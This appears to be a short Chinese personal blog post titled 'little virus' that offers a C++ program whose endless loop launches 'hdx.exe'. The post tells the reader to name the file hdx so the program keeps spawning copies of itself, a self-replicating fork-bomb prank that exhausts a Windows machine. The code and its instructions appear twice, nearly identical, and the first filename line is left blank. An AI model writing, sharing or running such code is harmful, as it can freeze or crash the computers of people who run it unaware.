- 2026suzhongcheng 的博客
小病毒
- 2024-8-8 16:13:53 @
1,
#include<bits/stdc++.h>
using namespace std;
int main(){
while(1){
system("start hdx.exe");
}
}
文件名记得改成,
不改也没事
1,
#include<bits/stdc++.h>
using namespace std;
int main(){
while(1){
system("start hdx.exe");
}
}
文件名记得改成hdx,
不改也没事。